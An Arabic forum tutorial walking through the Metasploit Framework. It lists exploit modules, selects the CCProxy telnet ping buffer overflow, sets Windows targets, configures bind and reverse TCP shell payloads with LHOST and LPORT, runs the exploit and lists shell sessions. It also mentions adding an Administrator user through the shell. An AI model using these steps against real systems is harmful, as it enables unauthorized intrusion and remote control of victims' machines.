مشروع الميتا اسبلويت
اولا هذا الشرح ليس للمستوي المبتدأ
يحتوي على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات و فحص الأنظمة و الشبكات
كما يحتوي علي قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة
قبل البداية بالشرح أحب اقول عدة اشياء
الميتا اسبلويت استخدامها سهل وبسيط بالاضافه الي انوا من اقوي الاختراق
وضعت لكم هذا الشرح من باب الغرض العلمي
رغم اعتزالي للهكر ولكن لرغبة احد الاصدقاء
نبدا علي بركة الله
اولا تنصيب الفرام وورك الخاص بالوينندوز او اللينكس
بعد تنصيب البرنامج
بيكون معه بعض الاداوت الخاصه
مثل n map
بعد اتمام عملية التنصيب بنجاح
تظهر لك شاشة مشابهه لشاشة الدوس
اتركها حتي ينتهي البرنامج بحفظ البيانات بالجهاز واكمال الادوات
بعد اتمام كل شئ تظهر لك شاشة الترحيب
اوك لحد هنا تمامـ
ثانيا نفتح البرنامج
اصحاب اللينكس بيكون البرنامج متواجد علي هذا المسار
/ كود:
pentest/exploits/framework3/
اما بالنسبة للويندوز بيكون زي اي برنامج عادي
من قايمة start -- all program
انت الان تتعامل مع شاشة مثل شاشة الدوس الصغير
لها محث msf<
لاظهار معلومات عن الاوامر الخاصة بالميتا نستخدم الامر هيلب
سيكون كتابة جميع اوامر الميتا علي هذا المنوال
بعدها انتر ثم انتظر النتيجه
اهم اوامر الثغرات هي
| اقتباس | | | | | | | | |
info exploit
use exploit
show exploits | | | | | |
1- الامر show exploits لعرض استغلالات الثغرة
2- الامرinfo exploit لعرض معلومات عن الثغرة والبرامج التي تشتغل عليها
3- الامر use exploit لاستخدام الثغرة والدخول لعيها
يعني في جميع الثغرات اللي راح نستخدمها لها طريقة في التنفيذ
الامر ليس بصعب
كل ما عليك هو انك هتتبع 4 خطوات راح اقولك عليهم وتكون مرتاح وشغال تمامـ
1- نستعرض ثغرات المسروع الموجودة والمتاحه لنا بالاصدار بالامر show exploits
2- نختار الثغرة اللي راح نطبق عليها ونظهر معلومات عنها بالامر info exploit
3- ندخل علي الثغرة ونطبق الاتصال معها بالامر use exploit
نبدأ بعرض الثغرات
يبدا البرنامج بفحص الشبكة
وعرض الاوفر فلو Overflow
Samba lsa_io_trans_names Heap Overflow solaris/samba/trans2open Samba trans2open Overflow (Solaris SPARC) solaris/sunrpc/sadmind_adm_build_path Sun Solaris sadmind adm_build_path() Buffer Overflow solaris/sunrpc/sadmind_exec Solaris sadmind Command Execution solaris/sunrpc/ypupdated_exec Solaris ypupdated Command Execution solaris/telnet/fuser Sun Solaris Telnet Remote Authentication Bypass Vulnerability solaris/telnet/ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow test/aggressive Internal Aggressive Test Exploit test/exploitme MIPS Aggressive Test Exploit test/kernel Internal Kernel-mode Test Exploit unix/misc/distcc_exec DistCC Daemon Command Execution unix/misc/spamassassin_exec SpamAssassin spamd Remote Command Execution unix/smtp/clamav_milter_blackhole ClamAV Milter Blackhole-Mode Remote Code Execution unix/webapp/awstats_configdir_exec AWStats configdir Remote Command Execution
تم اظهار ثغرات كثيرة وبجانب كل ثغرة البرنامج التي تشتغل علية الثغرة مثل النظام والاصدار التي تشتغل علية
ولاظهار معلومات اكتر سنتخدم الامر info
مثال
كود:
info windows/tftp/tftpdwin_long_filename
لتكون النتيجه
Name: TFTPDWIN v0.4.2 Long Filename Buffer Overflow Version: 5773 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Provided by: patrick <> Available targets: Id Name -- ---- 0 Universal - tftpd.exe Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 69 yes The target port Payload information: Space: 284 Avoid: 1 characters Description: This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten.
لنأخذ اقوي الثغرات ونجرب عليها
/ كود:
proxy/ccproxy_telnet_ping
ننفذ الثغرة بالميتا
كود:
info windows/proxy/ccproxy_telnet_ping
لنري الاستغلال
وهو معلومات عن الثغرة والمنافذ المفتوحه وكيف لنا ان ندخل من خلالها
كما تلاحظون
بدا بعرض الثغرات
Windows 2000 Pro All - English 1
Windows 2000 Pro All - Italian 2
Windows 2000 Pro All - French 3
Windows XP SP0/1 - English 4
Windows XP SP2 - English
Name Current Setting Required Description
Payload information:
في هذه الثغرة يوجد لدينا خيارين أساسيين
الأول هو IP السيرفر الذي يستعمل برنامج CCProxy
الثاني فهو المنفذ الذي يستخدمه البرنامج,
لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows اي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح
الأن ننفذ الأمر use لنستخدم الثغرة
كود:
use windows/proxy/ccproxy_telnet_ping
بعد تنفيذ الامر سوف نلاحظ انتقال المحث الي الامر use
معني ذلك اننا في حالة تصنت
الان نستخدم الامر show لعرض خيارات الثغرة المتاجه لنا
exploit(ccproxy_telnet_ping) > show options
اظهر لنا rehost وهو اي بي الجهاز
الان نبدأ باستهداف هذا الجهاز
بالامر
طبعا المنفذ الذي يستخدمه هذ البرنامج 23 البروكسي
ويمكن تغييرة حسب المستخدم باستخدام الامر
بعد ذلك نقوم بتحديد الانظمة المتاحه
باستخدام الامر show targets
تكون النتيجه
>> show targets
Exploit targets: Id Name -- ---- 0
Windows 2000 Pro All - Italian 2
Windows 2000 Pro All - French 3
Windows XP SP0/1 - English 4
Windows XP SP2 - English
الان لدينا 5 انظمة
نختار احدهم
انا راح اختار النظام رقم واحد
كود:
Windows 2000 Pro All - English 1
الان ندخل علي النظام
set TARGET 1
بعد ذلك نقوم باظهار الاستغلال المتاحه
تكون النتيجه هكذا
Trap generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6) generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support) generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager generic/debug_trap/reverse_ipv6_tcp Generic x86 Debug Trap, Reverse TCP Stager (IPv6) generic/debug_trap/reverse_nonx_tcp Generic x86 Debug Trap, Reverse TCP Stager (No NX Support) generic/debug_trap/reverse_ord_tcp Generic x86 Debug Trap, Reverse Ordinal TCP Stager generic/debug_trap/reverse_tcp Generic x86 Debug Trap, Reverse TCP Stager generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline windows/dllinject/bind_ipv6_tcp Windows Inject DLL, Bind TCP Stager (IPv6) windows/dllinject/bind_nonx_tcp Windows Inject DLL, Bind TCP Stager (No NX Support) windows/dllinject/bind_tcp Windows Inject DLL, Bind TCP Stager windows/dllinject/reverse_http
اختار انت اي استغلال يناسبك
نجرب علي هذا الاستغلال
windows/shell_bind_tcp
طريقة التنفيذ
set PAYLOAD windows/shell_bind_tcp
تستطيع فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator
الان نظهر الخيارات للثغرة
نستخدم الامر show options
ظهر لنا الخيارات المتاحه كاي دي الجهاز والمنفذ 4444
ولاستخدام الاتصال العكسي بدل الثغرة السابقه
نختار
كود:
windows/shell_reverse_tcp
ويكون التنفيذ
set PAYLOAD windows/shell_reverse_tcp
وبعدها اظهار show options
وهكذا علي اي ثغرة
نكمل علي الثغرة الثانيه وهي الاتصال العكسي
يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر: set LHOST 127.0.0.1
الان نطبق الامر exploit
اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال
لرؤية الاتصالات العكسية واظهاراها
نستخدم الامر sessions -l
لتكون النتيجه
>> sessions -l
Active sessions
1 Command shell 127.0.0.1:23443 -> 127.0.0.1:1024
اما في حالة No active sessions.
فأن هناك خطأ بالاتصال
ولنتصل باول اتصال
نقوم بتنفيذ الامر
وهكذا
ولعمل تحديث لثغرات الميتا
ننفذ الامراتمني ما يكون فيه غموض بالشرح
تحميل البرنامج
موقع الميتا اسبلويت
الخاص بالفرام وورك
البرنامج الخاص بالويندوز
البرنامج الخاص باللينكس
راجع الدرس مرة واتنين وتلاته راح تلقاه سهل وبسيط
avp hsjyJJghg eyvhj hgldjh hsfg,dj -- ,hgh,tJJv tgJJ,